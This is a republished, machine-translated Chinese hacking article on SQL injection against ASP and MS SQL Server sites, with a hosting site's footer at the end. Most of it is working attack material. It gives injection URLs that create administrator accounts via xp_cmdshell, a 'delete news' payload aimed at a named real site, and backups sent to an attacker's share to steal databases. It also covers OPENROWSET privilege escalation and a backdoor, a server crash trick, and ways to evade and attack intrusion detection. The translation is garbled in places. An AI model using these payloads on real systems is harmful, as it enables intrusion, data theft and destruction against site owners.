Some attacks on SQL databases

Source: Internet
Author: User
Keywords Attack
For a lot of news at home and abroad, BBS and E-commerce sites are used asp+sql design, and write ASP programmers Many (there are a lot of just graduated), so, Asp+sql attack success rate is also relatively high. This kind of attack method has little to do with the NT version and the SQL version. There is no corresponding patch, because the loophole is caused by the programmer, and most of the book on ASP programming, the source code example has this flaw exists, in fact, just some legitimate ASP on the request of SQL, leaving endless trouble! A This attack method originated from the vulnerability of ' or ' 1 ' = ' 1 (we call it a vulnerability for the moment), the principle of this loophole I think we all know, then the attendant is; exec sp_addlogin Hax (add a Hax user to the database), but this method is very restrictive, First, the SQL Server account used by ASP is an administrator, and the second requested submission variable is at the end of the entire SQL statement, because some programmers use the SELECT * from News WHERE id= ... and topic= ... And ... This method requests the database, and if you use the above example, it will news.asp?id=2;exec sp_addlogin hax into select * FROM news WHERE id=2;exec sp_addlogin Hax and topic=. .. And ... The entire SQL statement in the execution of the sp_addlogin stored procedures, and the existence of the judge, syntax error, your sp_addlogin naturally can not run normally, so try the following method news.asp?id=2;exec sp_addlogin Hax; --After the symbol of the sp_addlogin judgment statement into a comment, so there will be no grammatical errors, sp_addlogin normal execution! So let's get together, News.asp?id=2;exec master.dbo. Sp_addlogin hax;--news.asp?id=2;exec master.dbo. Sp_password null,hax,hax;--news.asp?id=2;exec master.dbo. sp_addsrvrolemember sysadmin hax;--news.asp?id=2;exec master.dbo. xp_cmdshell ' net user Hax hax/workstations:*/TIMES:ALL/PASSWORDCHG:yes/passwordreq:yes/active:yes/add ';--news.asp?id=2;exec master.dbo.xp_cmdshell ' net localgroup Administrators Hax/add ';--so, you left a Hax admin account in his database and system. Of course, the prerequisite is the ASP with Administrator account, so the virtual space we do not try, will not exist this loophole. Later we will discuss, if the other side of the ASP is not using SQL Administrator account, how we invade, of course, will involve 1433-port intrusion of course, we can try to add a ' symbol after the id=2, mainly to see how the other side of the ASP wrote. What do we do when the SQL account that the ASP program uses is not an admin? You like the letter of the homepage, there are news content, as follows: http://www.talentit.com.cn/news/news-2.asp?newid=117 you can try http://www.talentit.com.cn/news/news-2.asp? Newid=117;select 123;--hehe, report syntax error, select 123 Error, it is obvious that the new ASP in the NEWID after the variable with the end of the ' number to try http://www.talentit.com.cn/news/news-2.asp? newid=117 ';d elete news;--haha, I think as long as the table name is right, the news library is deleted the usual ASP SQL account even if not the administrator will be a database owner, at least for this library has a very high administrative rights but we do not know what the name of the library? Look at the db_name () function. Open your Query Analyzer, look at the print db_name (), hehe, the current database name comes out with the second analogy, as follows: Declare @a sysname;set @a=db_name (); backup Database @a to disk= ' Your IP your shared directory bak.dat ', name= ' test ';-Oh, his current databases are backed up to your hard drive, The next thing we're going to do is understand. Similarly this method can find each other's SQL IP first install a firewall, open ICMP and 139TCP and 445TCP warning prompts then try News.asp?id=2;exec master.dbo.xp_ Cmdshell ' Ping your IP ' If the firewall prompts someone to ping you,Then because you can be sure that the other side of the ASP with the SQL administrator rights, but also determine the exact location of the other's SQL Server, because a lot of large web site to consider performance, it will bar Web services and databases, when the other side of the big patch can not see the source code, I think this is the only way to quickly locate each other's SQL Server. Then, if the other ASP does not have SQL administrator rights, we can not call xp_cmdshell, what to do? Don't worry, try this. News.asp?id=2;declare @a;set @a=db_name (); Backup database @a to disk= ' Your IP your shared directory bak.dat ', name= ' test ';--hehe, Your firewall should warn, someone to connect your 445 or 139 (Win9 port, so that the other side of the SQL IP can also be exposed so if the other side of the database owner is not the case, we should do? Next time I'll tell you a better way. In fact, Backuo database to your hard disk or a bit exaggerated, if the other side of the data base is very large, you are dial-up Internet, oh, advised you not to try, it is difficult to successfully transfer the next time we will also talk about how to cheat the IDS implementation asp+sql intrusion now some good IDs have begun monitoring xp_ Cmdshell these keywords. All right, comrades, I'll see you next time. All the above URLs are expected to be submitted via VBScript because the browser's address bar will block out special characters so that your command cannot be transmitted in full Window.location.herf=url Add: This question was previously downloaded on the Internet, but only a few simple xp_cmdshell call restrictions are very large, in fact, there are many worthy of in-depth areas such as www.guosen.com.cn. This is the problem with the National credit card, and they use MS's three-tier structure to do the xp_cmdshell, the string will be filtered, but I tried, Heterogeneous requests with SQL can still open the Telnet service and the Administrators group account on each other's machine! Because the firewall is very strict checkpoint datagram access are only open 80 ports so, to get his database structure is more difficult, but there are ways to do: P by the way to remind people about Sqloledb,db_name,openrowset, OpenDataSource These system functions are useful when ASP's SQL Server account is just an ordinary user! SQL Server new vulnerabilities and some breaches I'm going to talk about some SqlserVer new bug, although I after a long period of effort, of course, a bit of the lucky ingredient, only to be able to find, dare not a person to enjoy, take out please identify, of course, some experts have already known, after all, I contacted SQL Server less than 1 years 1. About OPENROWSET and OPENDATASOURCE It's possible that this technique has already been done, that is, using OPENROWSET to send local commands usually our usage is (including MSDN's) as follows SELECT * FROM OPENROWSET (' SQLOLEDB ', ' myserver '; Sa '; ', ' SELECT * from table ') visible (even in the literal sense) OpenRowset only as a shortcut remote database access, it must follow the Select, that is, need to return a recordset So can we use it to invoke xp_cmdshell? The answer is YES! SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' Set fmtonly off exec master.dbo.xp_cmdshell ' dir c:\ '] must add set Fmtonly off to mask default settings that return only column information, so XP_ The output collection returned by Cmdshell is submitted to the previous select display, and if the default setting is used, returning an empty collection results in a select error and the command cannot be executed. So if we're going to call sp_addlogin, he's not going to return any of the collections like xp_cmdshell, we can no longer rely on the fmtonly set, and we could do the following: SELECT * FROM OPENROWSET (' SQLOLEDB ', ' Server '; ' Sa '; ', ' select ' ' ok! ' exec master.dbo.sp_addlogin hectic ') This way, the command will at least return to select ' ok! ' Collection, your machine Chamber of Commerce shows Ok!, while the other side of the database will also add a hectic account, that is to say, we use select ' ok! ' The return collection deceives the local select request, and the command is able to execute normally, as can be done by the sp_addsrvrolemember and OpenDataSource. As for the real use of this method, let's think about it 2. Questions about MSDASQL Two requests don't know if you've ever tried to connect to a remote database with a MSDASQL, of course.Pi must be an administrator of SQL Server to invoke, then the following select * FROM OPENROWSET (' Msdasql ', ' Driver={sql server};server=server;address=server, 1433;uid=sa;pwd=;d Atabase=master; NETWORK=DBMSSOCN ', ' select * FROM table1 select * from Table2 ') when the number of fields Table1 and table2 is not the same, you will find that each other's SQL Server crashes and even local connections fail. and system resources occupy all normal, with PsKill kill the SQL Server process, if not restart the machine, SQL Server can not start normally, or often illegal operation, I just happened to find this bug, the specific reason I have not figured out, And very strange is that this phenomenon only appears on the MSDASQL, SQLOLEDB do not have this problem, it seems that the problem is not the number of requests and return set number mismatch, because it is the problem of MSDASQL itself, specific reasons, we study together slowly 3. The scary back door used to be seen on the web. Some people say that leaving the back door on SQL Server can be done by adding triger,jobs or rewriting sp_addlogin and sp_addsrvrolemember, which of course works, but can easily be found. I wonder if you have ever thought about SQLOLEDB local connection mapping. Oh, for example, you use SQL Server's administrator account on each other's SQL Server to perform the following command SELECT * FROM OPENROWSET (' SQLOLEDB ', ' trusted_connection=yes;data source =hectic ', ' Set fmtonly off exec master. xp_cmdshell ' dir c:\ ') creates a local connection map named hectic on each other's SQL Server, and as long as SQL Server does not reboot, the mapping will persist, at least I don't know how to find the connection mappings that others have placed. Well, after the above command runs, you will find that even if SQL Server does not have any permissions to the guest user, running this command can also pass! and permission is localsystem!. (default installation) hehe! This method can be used to leave behind a backdoor to SQL Server that has been hacked to get administrator privileges. The above method in SqlseRver2000+sqlserver2000sp1! * There is also a guess, do not know if you have noticed that Windows default with the two DSN, one is LocalServer one is MSQI, these two are established by the local Administrator account connection to SQL Server, If the partner's SQL Server is started by a custom power user, then the SA's permissions are as hard as power user, but we select * FROM OPENROWSET (' Msdasql ', ' dsn= ') through the following command. Locaserver;trusted_connection=yes ', ' Set fmtonly off exec master. xp_cmdshell ' dirc:\ ' should be able to connect to local SQL Server with the Administrator account of LocalServer and then execute local commands with this account, which I think should be able to break through the SA Power User privilege. The problem now is that SQLOLEDB cannot invoke the DSN connection, and MSDASQL is not allowed to call, so I'm now looking for a way to call the guest msdasql, and if anyone knows how this bug breaks, or has a new idea, we can discuss it together, This release, if successfully used by the guest, would be a serious security breach. Because any of the SQL statements we mentioned earlier can be submitted to each other's ASP to help us perform the use of T-SQL to cheat IDs or attack IDs now, IDS has become more and more intelligent. Some IDs have joined the xp_cmdshell sp_addlogin surveillance. But after all, artificial intelligence does not appear today, this kind of surveillance is always a deceptive feeling first say deceive ids:ids since the monitoring xp_cmdshell keyword, then we can do so declare @a sysname set @a= "xp_" + "Cmdshell" exec @a ' dir c:\ ' This code is understandable, and xp_cmdshell as a store procedure has an ID number in the master library, and we can do that, assuming this id=988456 declare @a sysname Select @a =name from sysobjects where id=988456 exec @a ' dir c:\ ' Of course, you can declare @a sysname select @a=nameFrom sysobjects where id=988455+1 exec @a ' dir c:\ ' This sort of arrangement, IDs is impossible to completely monitor the same, sp_addlogin can do it again. Attack IDs: Because of the large amount of IDS data, it is usually backed up to a regular database, such as SQL Using an old recordset.addnew approach, the server can have a serious impact on the performance of IDs because it is efficient to make T-SQL requests through ADO, and there is a part of the work that could be given to SQL Server to do the usual program to write inserts VALUES (' Date to content ',...) so I think, if you use temp ') exec xp_cmdshell ' dir c:\ '--it will become Insert Table values (' Day to content ' ... ' temp ') exec XP _cmdshell ' dir c:\ ') in this way, xp_cmdshell can run in the IDs database: Of course, IDS is a sniffer, he will catch all the newspapers, and the browser will be submitted to the white space%20 so,%20 will be submitted to SQL Server, So your orders can't be executed. The only way is to Insert/**/table/**/values (' Day to content ' ... ' temp ')/**/exec/**/xp_cmdshell/**/' dir c:\ '/**/--') with/**/ Instead of space to do spacer, so that your T-SQL can be implemented in the IDs database indifferent can also use other statements can be broken, backup IDs database to your shared directory Oh in fact, the principle of this method and attack ASP is the same, but the space into a/**/ Originally ASP is a SELECT statement, then use ' Can shield now IDs with INSERT statement, then use ') shielding, many other new intrusion statements you can slowly think, the best Test tool is Query Analyzer. Responsible Editor Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 to force (0 Votes) Tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) passed (0 Votes) The original text: Some attacks of SQL database back to network security home

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.